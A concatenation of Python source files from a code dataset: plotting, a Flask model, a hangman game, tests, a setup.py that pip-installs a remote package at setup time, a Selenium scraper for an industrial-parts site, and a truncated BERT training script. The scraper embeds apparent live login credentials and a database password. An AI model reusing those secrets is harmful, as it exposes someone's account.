#check classification of points, update weights for the first one found to be wrong\n for p in points:\n if np.sign( np.dot(w, p) ) != classifyPoint( p ):\n w = np.add( w, classifyPoint( p ) * p ) \n wrongPoints += 1\n break\n if wrongPoints == 0:\n print (\"iterations :\"+str(iteration))\n averageIteration += iteration; \n done = True\n \n \n # drawing every Nth final function\n if(epoch % showN == 0):\n #print(\"epoch :\", str(epoch))\n x = np.array( [-1,1] )\n plt.plot( x, -w[1]/w[2] * x - w[0] / w[2] , 'r' )\n plt.draw()\n \n epoch += 1\n\nprint (\"Average Iteration :\"+ str(averageIteration/numEpochs))","sub_path":"April2013/plaNew.py","file_name":"plaNew.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"639015020","text":"import sys\n\nfrom flask_babel import lazy_gettext as _\nfrom sqlalchemy import event\nfrom typing import Dict, Any, Optional\n\nfrom app import db, get_locale\nfrom app.models.base_model import BaseEntity\n\n\nclass Page(db.Model, BaseEntity):\n __tablename__ = 'page'\n\n path = db.Column(db.String(200), unique=True)\n needs_paid = db.Column(db.Boolean)\n custom_read_permission = db.Column(db.Boolean)\n\n type = db.Column(db.String(256))\n\n def __init__(self, path, type='page'):\n self.path = path.rstrip('/')\n self.type = type\n\n # Store the page's revision class, based upon its type.\n self.revision_cls = self.get_revision_class()\n\n def __repr__(self):\n return '' % (self.id, self.path)\n\n def get_latest_revision(self):\n \"\"\"Get the latest revision of this page.\"\"\"\n revision = self.revision_cls.get_query()\\\n .filter(self.revision_cls.page_id == self.id)\\\n .order_by(self.revision_cls.id.desc())\\\n .first()\n\n return revision\n\n def get_revision_class(self):\n \"\"\"Turn a page's type into a revision class.\"\"\"\n if not self.type:\n return None\n\n class_name = '%sRevision' % (self.type.capitalize())\n try:\n revision_class = getattr(\n sys.modules['app.models.%s' % (self.type)], class_name)\n except AttributeError:\n return None\n\n return revision_class\n\n @staticmethod\n def strip_path(path):\n return path.rstrip('/')\n\n\n@event.listens_for(Page, 'load')\ndef set_revision_class(page, context):\n \"\"\"Calculate revision class.\"\"\"\n page.revision_cls = page.get_revision_class()\n\n\nclass SuperRevision(db.Model, BaseEntity):\n \"\"\"\n Contains all general revision fields, as well as some helper functions.\n\n Any revision class should inherit from this one.\n NOTE: I am not able to get a relationship to work with page here, so you\n will have to implement that yourself.\n \"\"\"\n\n __abstract__ = True\n\n # Things needed in template context.\n context: Dict[str, Any] = {}\n\n nl_title = db.Column(db.String(128))\n en_title = db.Column(db.String(128))\n comment = db.Column(db.String(1024))\n\n def __init__(self, nl_title, en_title, comment):\n self.title = None\n self.nl_title = nl_title\n self.en_title = en_title\n self.comment = comment\n\n def get_comparable(self):\n \"\"\"Compare titles, as long as no alternative comparable is given.\"\"\"\n return self.title\n\n @classmethod\n def get_query(cls):\n return cls.query.order_by(cls.id.desc())\n\n\nclass PageRevision(SuperRevision):\n __tablename__ = 'page_revision'\n\n filter_html = db.Column(db.Boolean)\n nl_content = db.Column(db.Text)\n en_content = db.Column(db.Text)\n\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n user = db.relationship('User', backref=db.backref('page_edits',\n lazy='dynamic'))\n\n custom_form_id = db.Column(db.Integer, db.ForeignKey('custom_form.id'))\n custom_form = db.relationship('CustomForm',\n backref=db.backref('page_revision',\n lazy='dynamic'))\n\n page_id = db.Column(db.Integer, db.ForeignKey('page.id'))\n page = db.relationship('Page', backref=db.backref('page_revisions',\n lazy='dynamic',\n cascade='all,delete'))\n\n def __init__(self, page: Optional[Page], nl_title, en_title, comment, user,\n nl_content, en_content, filter_html=True,\n custom_form_id=None) -> None:\n super(PageRevision, self).__init__(nl_title, en_title, comment)\n\n self.page = page\n\n self.filter_html = filter_html\n self.custom_form_id = custom_form_id\n self.content: Optional[str] = None\n self.nl_content = nl_content\n self.en_content = en_content\n self.user_id = user.id if user else None\n\n def get_comparable(self):\n return self.content\n\n\n@event.listens_for(PageRevision, 'load')\ndef set_page_revision_locale(page_rev, context):\n \"\"\"\n Load the correct info in the model.\n\n This function is called after an PageRevision model is filled with data\n from the database, but before is used in all other code.\n\n Use the locale of the current user/client to determine which language to\n display on the whole website. If the users locale is unavailable, select\n the alternative language, suffixing the title of the activity with the\n displayed language.\n \"\"\"\n locale = get_locale()\n nl_available = page_rev.nl_title and page_rev.nl_content\n en_available = page_rev.en_title and page_rev.en_content\n if locale == 'nl' and nl_available:\n page_rev.title = page_rev.nl_title\n page_rev.content = page_rev.nl_content\n elif locale == 'en' and en_available:\n page_rev.title = page_rev.en_title\n page_rev.content = page_rev.en_content\n elif nl_available:\n page_rev.title = page_rev.nl_title + \" (\" + _('Dutch') + \")\"\n page_rev.content = page_rev.nl_content\n elif en_available:\n page_rev.title = page_rev.en_title + \" (\" + _('English') + \")\"\n page_rev.content = page_rev.en_content\n else:\n page_rev.title = 'N/A'\n page_rev.content = 'N/A'\n\n\nclass PageReadPermission(db.Model, BaseEntity):\n \"\"\"Contains page group combinations with use custom read permissions.\"\"\"\n\n group_id = db.Column(db.Integer, db.ForeignKey('group.id'))\n group = db.relationship('Group')\n\n page = db.relationship('Page')\n page_id = db.Column(db.Integer, db.ForeignKey('page.id'))\n","sub_path":"app/models/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"337103255","text":"import speedtest,time \r\nfrom random import randint\r\nst = speedtest.Speedtest()\r\n\r\ndef getDownloadSpeed():\r\n\tspeed=st.download()\r\n\tspeed=speed/8388608\r\n\treturn [speed,time.time()]\r\n\t\r\n\r\ndef getUploadSpeed():\r\n\tspeed=st.upload()\r\n\tspeed=speed/8388608\r\n\treturn [speed,time.time()]\r\n\r\ndef getPing():\r\n\treturn st.results.ping\r\n\r\n\r\ndef getServer():\r\n\tservernames =[] \r\n\tservers=st.get_servers() \r\n\tprint(\"===Server Info===\")\r\n\tconfig=st.get_config()\r\n\tx=config.get(\"client\")\r\n\treturn x\r\n","sub_path":"Script/speedt.py","file_name":"speedt.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"526211518","text":"import random\nimport string\n\n\"\"\"\nDescription: A simple command line hangman program\nAuthor: Annapoorna Shastry\n\"\"\"\n\ndef loadWords():\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(\"H:\\\\hobby_projects\\\\words.txt\", 'r', 0)\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = string.split(line)\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n return random.choice(wordlist)\n\ndef getGuessedWord(secretWord, lettersGuessed):\n word = ''\n for char in secretWord:\n if char in lettersGuessed:\n word = word + char\n else:\n word = word + \"_ \"\n return word\n\ndef getAvailableLetters(lettersGuessed):\n s = string.ascii_lowercase\n for char in lettersGuessed:\n if char in s:\n s = s.replace(char, '')\n return s\n \ndef hangman(secretWord):\n print(\"I am thinking of a word that is \" + str(len(secretWord)) + \" letters long.\")\n print(\"-------------\")\n guessesLeft = 8\n count = len(secretWord)\n lettersGuessed = []\n while guessesLeft > 0 and count > 0:\n secret = secretWord\n print(\"You have \" + str(guessesLeft) + \" guesses left.\")\n print(\"Available letters: \" + getAvailableLetters(lettersGuessed))\n guess = input(\"Please guess a letter: \")\n guess = guess.lower()\n if guess.isalpha() and len(guess) == 1:\n if guess in lettersGuessed:\n print(\"Oops! You've already guessed that letter: \" + getGuessedWord(secretWord, lettersGuessed))\n print(\"------------\")\n else :\n lettersGuessed.append(guess)\n if guess in secretWord:\n #lettersGuessed.append(guess)\n print(\"Good guess: \" + getGuessedWord(secretWord, lettersGuessed))\n print(\"------------\")\n while secret.find(guess) >= 0:\n count -= 1\n secret = secret[secret.find(guess)+1:]\n else :\n #lettersGuessed.append(guess)\n print(\"Oops! That letter is not in my word: \" + getGuessedWord(secretWord, lettersGuessed))\n guessesLeft -= 1\n print(\"-----------\")\n if guessesLeft == 0:\n print(\"Sorry, you ran out of guesses. The word was \" + secretWord + \" :(\")\n print(\"-----------\")\n print()\n elif count == 0:\n print(\"Congratulations, you won! :D\")\n print(\"-----------\")\n print()\n\nWORDLIST_FILENAME = \"H:\\\\hobby_projects\\\\words.txt\"\nwordlist = loadWords()\n\nprint(\"****** WELCOME TO THE GAME, HANGMAN! ******\")\nwhile True:\n choice = input(\"Please enter 'c' to play/continue and q to quit: \")\n choice = choice.lower()\n if choice == 'c':\n secretWord = chooseWord(wordlist).lower()\n hangman(secretWord)\n elif choice == 'q':\n break\n else:\n print(\"Oops! I didn't get what you said..\")\n","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"466761270","text":"# -*- coding: utf-8 -*-\nimport os\nimport codecs\nimport shutil\nimport unittest\nimport tempfile\nimport contextlib\n\nfrom requires_io.main import Config, require_io_re, _to_urls\n\n\nclass Repository(object):\n\n def __init__(self, name):\n self.name = name\n self.root = None\n\n @contextlib.contextmanager\n def context(self):\n tmp = tempfile.mkdtemp()\n try:\n self.root = os.path.join(tmp, self.name)\n yield self\n finally:\n shutil.rmtree(tmp)\n self.root = None\n\n def write(self, filename, content, **kwargs):\n path = os.path.normpath(os.path.join(self.root, filename))\n fld = os.path.dirname(path)\n if not os.path.exists(fld):\n os.makedirs(fld)\n with codecs.open(path, kwargs.pop('mode', 'w'), **kwargs) as fd:\n fd.write(content)\n if kwargs.get('clrf', True):\n if not content.endswith('\\n'):\n fd.write('\\n')\n\n\nclass TestCase(unittest.TestCase):\n\n def assertIsNotNone(self, val): # missing in 2.6\n self.assertTrue(val is not None)\n\n def test_re(self):\n self.assertIsNotNone(require_io_re.search('/foo/bar/setup.py'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/tox.ini'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/buildout.cfg'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/versions.cfg'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements.txt'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements.pip'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements/prod.txt'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements/test.pip'))\n\n def test_to_url(self):\n self.assertEquals([], _to_urls([]))\n self.assertEquals(['setup.py'], _to_urls(['/foo/bar/setup.py']))\n self.assertEquals(\n ['setup.py', 'requirements/prod.txt'],\n _to_urls(['/foo/bar/setup.py', '/foo/bar/requirements/prod.txt']),\n )\n\n def assertPaths(self, repository, paths, raw_paths):\n config = Config({}, raw_paths)\n self.assertEquals(paths, config.paths)\n\n def test_paths(self):\n repository = Repository('foo')\n with repository.context():\n repository.write('setup.py', 'hello')\n repository.write('foobar.txt', 'hello')\n self.assertPaths(repository, set([os.path.join(repository.root, 'setup.py')]), [repository.root, ])\n self.assertPaths(\n repository,\n set([os.path.join(repository.root, 'foobar.txt')]),\n [os.path.join(repository.root, '*.txt'), ],\n )\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"requires_io/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261446284","text":"#! -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport sys\nimport pip\n\npython_version = sys.version_info\n\n\n# check required libraries\ndev_extras = ['pyknp']\ndependency_links = ['http://nlp.ist.i.kyoto-u.ac.jp/DLcounter/lime.cgi?down=http://lotus.kuee.kyoto-u.ac.jp/nl-resource/pyknp/pyknp-0.3.tar.gz&name=pyknp-0.3.tar.gz']\n\n# Try to install packages not controlled by pip\nfor package_url in dependency_links: pip.main(['install', package_url])\n\nif python_version >= (3, 0, 0):\n install_requires = ['pypandoc', 'future', 'six', 'mecab-python3', 'jaconv>=0.2', 'pyknp', 'kytea', 'pip>=8.1.0', 'typing']\nelse:\n install_requires = ['pypandoc', 'future', 'six', 'mecab-python', 'jaconv>=0.2', 'pyknp', 'kytea', 'pip>=8.1.0', 'typing']\n\nversion = '1.2.7'\nname = 'JapaneseTokenizer'\nshort_description = '`JapaneseTokenizer` is a package for easy Japanese Tokenization'\n\ntry:\n import pypandoc\n long_description = pypandoc.convert('README.md', 'rst')\nexcept(IOError, ImportError):\n long_description = open('README.md').read()\n\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Natural Language :: Japanese\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\"\n ]\n\nsetup(\n author='Kensuke Mitsuzawa',\n author_email='kensuke.mit@gmail.com',\n name = name,\n version=version,\n short_description=short_description,\n long_description=long_description,\n keywords = ['MeCab', '和布蕪', 'Juman',\n 'Japanese morphological analyzer', 'NLP', '形態素解析', '自然言語処理'],\n license = \"MIT\",\n url = \"https://github.com/Kensuke-Mitsuzawa/JapaneseTokenizers\",\n test_suite='test.test_all.suite',\n install_requires = install_requires,\n dependency_links=dependency_links,\n packages=find_packages(),\n extras_require=dict(\n dev=dev_extras,\n )\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575638954","text":"import random\nimport re\nimport time\nimport bs4\nimport xlrd\nimport pymysql\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\n\ndef s(a,b):\n t=random.randint(a,b)\n time.sleep(t)\n\ndef company_info():\n company_name=\"正泰\"\n return company_name\n\n\ndef login_url(uid,pwd):\n driver.find_element_by_css_selector('.login-text.m-top5.act-bg.J_userName').send_keys(uid)\n driver.find_element_by_css_selector('.login-text.m-top5.psw-bg.J_psw').send_keys(pwd)\n driver.find_element_by_css_selector('.login-save.m-top10.ft20.cursor.J_loginIn').click()\n s(3,5)\n\ndef get_main_data_bak(company_name,url):\n J_searchLists=driver.find_elements_by_xpath(\"//div[@class='J_searchList']/ul\")\n for Searchlist in J_searchLists:\n img_url=Searchlist.find_element_by_xpath(\"./li[@class='a']/a/img\").get_attribute('src')\n prt_name=Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").text\n\n prt_url =Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").get_attribute('href')\n prt_id = prt_url[prt_url.index(\"product/\") + 8:100]\n prt_type=Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[0].text\n order = Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[1].text\n try:\n price=Searchlist.find_element_by_xpath(\"./li[@class='e lh tl']/div[@class='search-active']/span[@class='a']\").text\n except:\n price=\"\"\n try:\n market_price = Searchlist.find_element_by_xpath(\"./li[@class='e lh tl']/div[@class='search-active']/span[@class='b']\").text\n except:\n market_price=\"\"\n stock=Searchlist.find_element_by_xpath(\"./li[@class='f']\").text\n print(img_url,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock)\n insert_data1(company_name,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock,url)\n\ndef get_main_data(company_name,table_id):\n page_num=1\n while 1==1:\n J_searchLists = driver.find_elements_by_xpath(\"//div[@class='J_searchList']/ul\")\n for Searchlist in J_searchLists:\n img_url = Searchlist.find_element_by_xpath(\"./li[@class='a']/a/img\").get_attribute('src')\n prt_name = Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").text\n\n prt_url = Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").get_attribute('href')\n prt_id = prt_url[prt_url.index(\"product/\") + 8:100]\n prt_type = Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[0].text\n order = Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[1].text\n try:\n price = Searchlist.find_element_by_xpath(\n \"./li[@class='e lh tl']/div[@class='search-active']/span[@class='a']\").text\n except:\n price = \"\"\n try:\n market_price = Searchlist.find_element_by_xpath(\n \"./li[@class='e lh tl']/div[@class='search-active']/span[@class='b']\").text\n except:\n market_price = \"\"\n stock = Searchlist.find_element_by_xpath(\"./li[@class='f']\").text\n #print(img_url, prt_id, prt_name, prt_url, prt_type, order, price, market_price, stock)\n insert_data1(company_name, prt_id, prt_name, prt_url, prt_type, order, price, market_price, stock, table_id)\n\n try:\n page_num += 1\n print(\"翻页-%s\"%str(page_num))\n driver.find_element_by_xpath(\n \"//div[@class='saas-paging J_paging']/a[@class='J_page_turn'][@page-id='\" + str(\n page_num) + \"']\").click()\n s(5,7)\n except NoSuchElementException as e:\n print(e)\n break\n\n\n\n\ndef insert_data1(company_name,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock,table_id):\n #company_name=company_info()\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"vipmro\")\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n db.set_charset(\"utf8\")\n cursor.execute(\"SET NAMES utf8;\")\n cursor.execute(\"SET CHARACTER SET utf8;\")\n cursor.execute(\"SET character_set_connection=utf8;\")\n\n sql=\"insert into vipmro_net_data (company_name,prt_id,prt_name,prt_url,prt_type,order_,price,market_price,stock,cate_id)\"\\\n \"values('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')\"\\\n %(company_name,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock,table_id)\n try:\n # 执行sql语句\n cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\n # print(prt_name+'--------2-finished')\n except Exception as err:\n # 如果发生错误则回滚\n db.rollback()\n print('---------------Error------Message--------:' + str(err))\n # 关闭数据库连接\n db.close()\n\n\ndef next_page(j):\n s(3, 5)\n xpath_data=\"//div[@class='saas-paging J_paging']/a[@class='J_page_turn'][@page-id='\"+str(j+2)+\"']\"\n print(xpath_data)\n driver.find_element_by_xpath(xpath_data).click()\n s(3, 6)\n\ndef get_url_status():\n #company_name=company_info()\n db = pymysql.connect(\"localhost\",\"root\",\"123456\",\"vipmro\",charset=\"utf8\" )\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n sql=\"select table_id,case when cate_2_url='' then cate_1_url else cate_2_url end as url,company_name from vipmro_net_url where status=0 order by table_id \"\n\n try:\n execute=cursor.execute(sql)\n data=cursor.fetchmany(execute)\n return data\n except Exception as err:\n # 如果发生错误则回滚\n db.rollback()\n print('---------------Error------Message--------:' + str(err))\n # 关闭数据库连接\n db.close()\n cursor.close()\n\ndef update_status_to_run_log(table_id):\n db = pymysql.connect(\"localhost\",\"root\",\"123456\",\"vipmro\",charset=\"utf8\" )\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # 使用 execute() 方法执行 SQL 查询\n sql=\"update vipmro_net_url set status=1 where table_id='%s' \" \\\n % (table_id)\n try:\n cursor.execute(sql)\n db.commit()\n except Exception as err:\n db.rollback()\n print('---------------Error------Message--------:'+str(err))\n db.close()\n cursor.close()\n\ndef find_series(num):\n series_names=[]\n series_urls=[]\n series_tmp= driver.find_elements_by_css_selector('.b.p-left10.no-border')\n series_info_div = driver.find_elements_by_css_selector('.b.p-left10.no-border')[num]\n series_info=series_info_div.find_elements_by_tag_name('a')\n print(\"%s个分支\"%str(len(series_info)))\n\n for i in range(len(series_info)):\n series_name=series_info[i].text\n series_url=series_info[i].get_attribute('href')\n #print(series_name,series_url)\n series_names.append(series_name)\n series_urls.append(series_url)\n return series_names,series_urls\n\n\nif __name__==\"__main__\":\n browser = \"Firefox\"\n\n if browser == \"Chrome\":\n options = webdriver.ChromeOptions()\n # options.add_experimental_option(\"excludeSwitches\", [\"ignore-certificate-errors\"]) #去掉不受支持的命令行标记\n options.add_argument('--user-data-dir=C:/Users/CC-SERVER/AppData/Local/Google/Chrome/User Data/Default') # 设置成用户自己的数据目录\n driver = webdriver.Chrome(chrome_options=options)\n else:\n if browser == \"Firefox\":\n driver = webdriver.Firefox()\n else:\n driver = webdriver.PhantomJS()\n\n url = \"http://www.vipmro.net/login\"\n driver.get(url)\n s(3, 5)\n uid='18861779873'\n pwd='zhang1986'\n login_url(uid,pwd)\n #完成登录\n #点击一下搜索按钮,使页面正确加载url\n #driver.find_element_by_css_selector(\".index-button.cursor.ft14.J_searchListTop\").click()\n driver.get(\"http://www.vipmro.net/search?keyword=%25E6%2596%25BD%25E8%2580%2590%25E5%25BE%25B7\")\n s(3, 5)\n driver.find_element_by_css_selector(\".index-button.cursor.ft14.J_searchListTop\").click()\n s(3, 5)\n\n data = get_url_status()\n for i in range (len(data)):\n table_id=data[i][0]\n url=data[i][1]\n company_name=data[i][2]\n #url=str(url_t).replace(\"(('\",\"\").replace(\"',),)\",\"\")\n print(company_name,url)\n #url=u'http://www.vipmro.net/search?keyword=%25E5%25BE%25B7%25E5%258A%259B%25E8%25A5%25BF&categoryId=50101811'\n driver.get(url)\n s(4, 6)\n\n #先判断一共多少页\n page_num=driver.find_element_by_css_selector('.J_page_sum.t_num').text\n print(\"##################当前类目共%s页数据\"%page_num)\n if page_num=='15':\n #拆到系列这一级\n print(\"进行第一级系列的细化\")\n series_names, series_urls=find_series(1)\n for x in range(len(series_names)):\n print(\"分支\",series_names[x],series_urls[x])\n driver.get(series_urls[x])\n s(3,5)\n\n page_num2 = driver.find_element_by_css_selector('.J_page_sum.t_num').text\n print(\"当前类目共%s页数据\" % page_num2)\n if page_num2 == '15':\n # 拆到系列这一级\n print(\"进行第二级的细化\")\n series_names2, series_urls2 = find_series(2)\n for y in range(len(series_names2)):\n print(\"分支\", series_names2[y], series_urls2[y])\n driver.get(series_urls2[y])\n s(5, 8)\n\n page_num3 = driver.find_element_by_css_selector('.J_page_sum.t_num').text\n print(\"当前类目共%s页数据\" % page_num3)\n if page_num3 == '15':\n print(\"进行第三级的细化\")\n series_names3, series_urls3 = find_series(3)\n for z in range (len(series_names3)):\n print(\"分支\", series_names3[z], series_urls3[z])\n driver.get(series_urls3[z])\n s(3, 5)\n get_main_data(company_name, table_id)\n else:\n get_main_data(company_name, table_id)\n else:\n get_main_data(company_name, table_id)\n\n else:\n get_main_data(company_name, table_id)\n #update_status_to_run_log(table_id)\n\n\n\n","sub_path":"工品汇/正泰.NET/工品汇2.1-main.py","file_name":"工品汇2.1-main.py","file_ext":"py","file_size_in_byte":10617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"170066610","text":"import tensorflow as tf\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nfrom transformers import BertForSequenceClassification\nimport torch\nfrom transformers import AutoModel,AutoTokenizer\nimport numpy as np\nimport json,os,re\nfrom collections import Counter\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.model_selection import StratifiedKFold\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom transformers import AdamW\nfrom transformers import get_linear_schedule_with_warmup\nimport time,datetime\nfrom sklearn.metrics import classification_report\nimport random\nimport nltk\nnltk.download('wordnet')\nfrom nltk.corpus import wordnet \nfrom random import shuffle\n\n\n# If there's a GPU available...\nif torch.cuda.is_available(): \n\n # Tell PyTorch to use the GPU. \n device = torch.device(\"cuda\")\n\n print('There are %d GPU(s) available.' % torch.cuda.device_count())\n\n print('We will use the GPU:', torch.cuda.get_device_name(0))\n\n# If not...\nelse:\n print('No GPU available, using the CPU instead.')\n device = torch.device(\"cpu\")\n \ndef preprocess_data(tokenizer, sentences, MAX_LEN = 256):\n \"\"\"\n :params[in]: tokenizer, the configured tokenizer\n :params[in]: sentences, list of strings\n \"\"\"\n # 1. Tokenize all of the sentences and map the tokens to thier word IDs.\n input_ids = []\n \n # For every sentence...\n for sent in sentences:\n # `encode` will:\n # (1) Tokenize the sentence.\n # (2) Prepend the `[CLS]` token to the start.\n # (3) Append the `[SEP]` token to the end.\n # (4) Map tokens to their IDs.\n encoded_sent = tokenizer.encode(\n sent, # Sentence to encode.\n add_special_tokens = True, # Add '[CLS]' and '[SEP]'\n # This function also supports truncation and conversion\n # to pytorch tensors, but we need to do padding, so we\n # can't use these features :( .\n #max_length = 128, # Truncate all sentences.\n #return_tensors = 'pt', # Return pytorch tensors.\n ) \n # Add the encoded sentence to the list.\n input_ids.append(encoded_sent)\n \n # Set the maximum sequence length.\n # maximum training sentence length of 87...\n \n print('\\nPadding/truncating all sentences to %d values...' % MAX_LEN)\n \n print('\\nPadding token: \"{:}\", ID: {:}'.format(tokenizer.pad_token, tokenizer.pad_token_id))\n \n # Pad our input tokens with value 0.\n # \"post\" indicates that we want to pad and truncate at the end of the sequence,\n # as opposed to the beginning.\n input_ids = pad_sequences(input_ids, maxlen=MAX_LEN, dtype=\"long\", \n value=0, truncating=\"post\", padding=\"post\")\n # Create attention masks\n attention_masks = []\n # For each sentence...\n for sent in input_ids:\n \n # Create the attention mask.\n # - If a token ID is 0, then it's padding, set the mask to 0.\n # - If a token ID is > 0, then it's a real token, set the mask to 1.\n att_mask = [int(token_id > 0) for token_id in sent]\n \n # Store the attention mask for this sentence.\n attention_masks.append(att_mask)\n return input_ids, attention_masks\n\n# Function to calculate the accuracy of our predictions vs labels\ndef flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\ndef format_time(elapsed):\n '''\n Takes a time in seconds and returns a string hh:mm:ss\n '''\n # Round to the nearest second.\n elapsed_rounded = int(round((elapsed)))\n \n # Format as hh:mm:ss\n return str(datetime.timedelta(seconds=elapsed_rounded))\n\ndef train_eval(clf_model, train_dataloader, validation_dataloader, base_dir,\n weights=None, lr=2e-5, epochs=4, eval_every_num_iters=40, seed_val = 42):\n \"\"\"train and evaluate a deep learning model\n :params[in]: clf_model, a classifier\n :params[in]: train_dataloader, training data\n :params[in]: validation_dataloader, validation data\n :params[in]: base_dir, output directory to create the directory to save results\n :params[in]: lr, the learning rate\n :params[in]: epochs, the number of training epochs\n :params[in]: eval_every_num_iters, the number of iterations to evaluate\n :params[in]: seed_val, set a random seed\n \"\"\"\n # the 'W' stands for 'Warm up\", AdamW is a class from the huggingface library\n optimizer = AdamW(clf_model.parameters(),\n lr = lr, # args.learning_rate - default is 5e-5, our notebook had 2e-5\n eps = 1e-8 # args.adam_epsilon - default is 1e-8.\n )\n # Number of training epochs (authors recommend between 2 and 4)\n epochs = epochs\n # Total number of training steps is number of batches * number of epochs.\n total_steps = len(train_dataloader) * epochs\n # Create the learning rate scheduler.\n scheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = 1, # Default value in run_glue.py\n num_training_steps = total_steps)\n # see if weights is None:\n if weights != None:\n weights = torch.FloatTensor(weights)\n # Set the seed value all over the place to make this reproducible.\n random.seed(seed_val)\n np.random.seed(seed_val)\n torch.manual_seed(seed_val)\n torch.cuda.manual_seed_all(seed_val)\n \n # Store the average loss after each epoch so we can plot them.\n loss_values = []\n \n # For each epoch...\n for epoch_i in range(0, epochs):\n \n # ========================================\n # Training\n # ========================================\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n \n # Measure how long the training epoch takes.\n t0 = time.time()\n \n # Reset the total loss for this epoch.\n total_loss = 0\n \n # Put the model into training mode. Don't be mislead--the call to \n # `train` just changes the *mode*, it doesn't *perform* the training.\n # `dropout` and `batchnorm` layers behave differently during training\n # vs. test (source: https://stackoverflow.com/questions/51433378/what-does-model-train-do-in-pytorch)\n clf_model.train() ## model training mode\n \n # For each batch of training data...\n for step, batch in enumerate(train_dataloader):\n \n # Unpack this training batch from our dataloader. \n #\n # As we unpack the batch, we'll also copy each tensor to the GPU using the \n # `to` method.\n #\n # `batch` contains three pytorch tensors:\n # [0]: input ids \n # [1]: attention masks\n # [2]: labels \n b_input_ids = batch[0].to(device)\n b_input_mask = batch[1].to(device)\n b_labels = batch[2].to(device)\n \n # Always clear any previously calculated gradients before performing a\n # backward pass. PyTorch doesn't do this automatically because \n # accumulating the gradients is \"convenient while training RNNs\". \n # (source: https://stackoverflow.com/questions/48001598/why-do-we-need-to-call-zero-grad-in-pytorch)\n clf_model.zero_grad() \n \n # Perform a forward pass (evaluate the model on this training batch).\n # This will return the loss (rather than the model output) because we\n # have provided the `labels`.\n # The documentation for this `model` function is here: \n # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification\n outputs = clf_model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask, \n labels=b_labels,\n weights=weights)\n #weights=torch.FloatTensor([100/127,100/191,100/34]))\n \n # The call to `model` always returns a tuple, so we need to pull the \n # loss value out of the tuple.\n loss = outputs[0]\n \n # Accumulate the training loss over all of the batches so that we can\n # calculate the average loss at the end. `loss` is a Tensor containing a\n # single value; the `.item()` function just returns the Python value \n # from the tensor.\n total_loss += loss.item()\n \n # Perform a backward pass to calculate the gradients.\n loss.backward()\n \n # Clip the norm of the gradients to 1.0.\n # This is to help prevent the \"exploding gradients\" problem.\n torch.nn.utils.clip_grad_norm_(clf_model.parameters(), 1.0)\n \n # Update parameters and take a step using the computed gradient.\n # The optimizer dictates the \"update rule\"--how the parameters are\n # modified based on their gradients, the learning rate, etc.\n optimizer.step() \n # Update the learning rate.\n scheduler.step()\n # eveluate the performance after some iterations\n if step % eval_every_num_iters == 0 and not step == 0:\n # Calculate elapsed time in minutes.\n elapsed = 